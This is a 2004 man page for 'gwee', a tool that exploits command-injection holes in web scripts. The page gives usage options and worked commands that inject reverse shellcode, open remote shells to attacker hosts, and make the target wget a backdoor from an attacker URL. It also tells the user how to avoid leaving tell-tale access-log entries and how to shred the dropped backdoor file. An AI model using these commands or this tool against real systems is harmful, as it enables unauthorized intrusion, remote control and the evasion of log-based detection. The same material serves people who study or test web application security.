gwee(1) Security tools gwee(1)NAMEgwee - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
Perl and Python shellcode and expertise by Sabu <sabu@sentinix.org>
SYNOPSISgwee -h|-V
gwee options url
DESCRIPTIONgwee (generic web exploitation engine) is a small program written in C
designed to exploit arbitrary command execution vulnerabilities in web
scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit,
except more general-purpose. It features several reverse (connecting)
shellcodes (x86 Linux, FreeBSD, NetBSD, Perl script (universal), Python
script (universal)), several methods of injecting (executing) them,
built-in http/https client and built-in server (listener) for receiving
connections (and remote shell) from injected shellcodes. gwee is dis‐
tributed under the MIT License. The Perl and Python shellcodes were
written by Sabu <sabu@sentinix.org>.
OPTIONS-h Display help (you can execute gwee without arguments too).
-y string
The parameter to insert before the shellcode injection command
line is inserted. The shellcode is inserted between the values
of the -y option and the -z option. In POST requests (default
behaviour), the -y and -z options go into the POST data, not in
the URL. In GET and HEAD requests, the "-y <shellcode> -z"
option combination is appended to the URL. If you need to add a
'?' you can do that either in the URL or as the first char of
the -y option. By default, -y and -z are empty.
-z string
String to append after the shellcode injection command. By
default, the -z string is empty. An example usage of the -y-z
option combo would be:
$ gwee-H -y '?testvar=' -z '|' target/cgi-bin/test.cgi
This will resolve into:
http://target/cgi-bin/test.cgi?testvar=perl -e "print <shellcode>"|
Of course, you could have done it this way too, same result:
$ gwee-z '|' 'target/cgi-bin/test.cgi?testvar='
$ gwee-y testvar= -z '|' target/cgi-bin/test.cgi
This will resolve into:
http://target/cgi-bin/test.cgi
POST data: testvar=perl -e "print <shellcode>"|
-G Use HTTP GET instead of POST. This is not recommended since
nasty long tell-tail strings will end up in the access_log. In
order for the whole payload to fit into a 1024 byte GET request,
the shellcode is split up into 4 separate requests, all produc‐
ing nasty logs. -H Use HTTP HEAD instead of POST/GET. Read
about -G, the same nasty logs will appear on the target and the
shellcode will be split into 4 requests.
-l your_ip_or_hostname
The IP or hostname to have the shellcode connect back to. Host‐
names will be resolved into IP numbers, since that's the only
method used by the binary shellcodes.
-p port
The port to connect back to, default is 31337.
-s # Choose which shellcode to install on the target:
0 = Sabu's Perl shellcode (default if -s is omitted)
1 = Linux x86 binary
2 = FreeBSD x86 binary
3 = NetBSD x86 binary
4 = Sabu's Python shellcode (the target must have Python installed)
-i # Choose shellcode injection method:
0 = perl -e "print
1 = python -c "__import__(
2 = printf "<hex>"
3 = echo -ne "<hex>" (works only if target's /bin/sh is bash)
-I prefix_path
Choose a prefix to the shellcode injection method, e.g.:
-i1 -I /usr/local/bin/
that would parse it into: /usr/local/bin/python -c... default
is empty (the preferred way).
-T /var/tmp/.vetx.95
Choose a different temporary filename for the shellcode/backdoor
on the target than the default.
-a user agent string
Choose user agent string, e.g.:
-a "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
If -a is omitted, gwee will randomize from 25 real user-agent
strings.
-v Be really verbose, disclose exactly which commands are being
executed.
-q Be really silent, only output error messages, nothing else.
-L Run built-in tcp listener (no need to use "nc -l").
-A Only listen for incoming connection on -p port, nothing else.
This is just like: nc -l -p port -w timeout
-t seconds
Time-out in seconds until listener (-L) times out. Default is
-t30 (30 seconds), -t0 means no time-out.
-f Simply non-interactive, you don't need to press return to pro‐
ceed.
-w http://home.of.attacker/reverse_shellcode
If you specify the -w option, the injection methods won't be
used. Instead "wget -Yoff -q -O <bd> <url>" will be executed on
the target to download a reverse shellcode/backdoor that will
consequently be execute as per usual. Use the -d option to dump
a shellcode that you can upload somewhere.
-d outfile
This option will dump shellcode instead of injecting it some‐
where. You use the -l -p and -s options as usual, but instead of
connecting somewhere, the generated shellcode will be dumped to
a file you specify after the -d. Upload this file to a webserver
and use it's URL with the -w option. For example, this command
will dump x86 Linux sishell:
$ gwee-lyourhostname. -p1337 -s1 -d bd
$ scp bd leet@host:/wwwroot/
$ gwee-w http://host/bd -LG -p1337 'target/cgi-bin/vuln.cgi?'
-P Preserve the shellcode after injection. Normally, the exploit
will send a HTTP POST, HEAD or GET request trying to execute "rm
-f /var/tmp/.vetx.95" This will leave nasty logs even after you
wipe yourself from the logs. If you know you'll get a shell on a
box, use the -P option with the -L option. Once connected with
-L, it'll automatically send a "shred -fu ; rm -f" over the con‐
nected socket.
-r Remove created backdoor file (shellcode) on the target. This is
done automatically, but you still have the choice to explicitly
do a remove.
EXAMPLESgwee-y 'q=%3B' -l fubar.org. -p 6666 -L https://target/cgi-bin/vuln.cgi
gwee -y'?cmd=' -z'|' -G -l mydom.tld -p 9000 -s1 -i3 -Lf target/vuln.pl
gwee -y'loginname=%3B' -l mydom.tld -p80 -Lf https://target/userstat.pl
gwee-A -p 6666 -t0 -q
LICENSEgwee - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
Perl and Python shellcode and expertise by Sabu <sabu@sentinix.org>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Soft‐
ware"), to deal in the Software without restriction, including without
limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MER‐
CHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFT‐
WARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
AUTHOR
My name is Michel Blomgren. I'm an information security consultant spe‐
cializing in risk/vulnerability assessment and penetration testing with
Cycom AB, www.cycom.se. I'm the developer of SENTINIX, a GNU/Linux dis‐
tribution designed for monitoring, intrusion detection, anti-spam,
anti-virus and clustering. You may contact me by sending an e-mail to
<michel@cycom.se>. If you like to keep the conversation private, fetch
my PGP public key on http://www.cycom.se/misc/pubkeymichel.asc (886A
7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA).
SEE ALSOrrs(1)gwee May 2004 gwee(1)
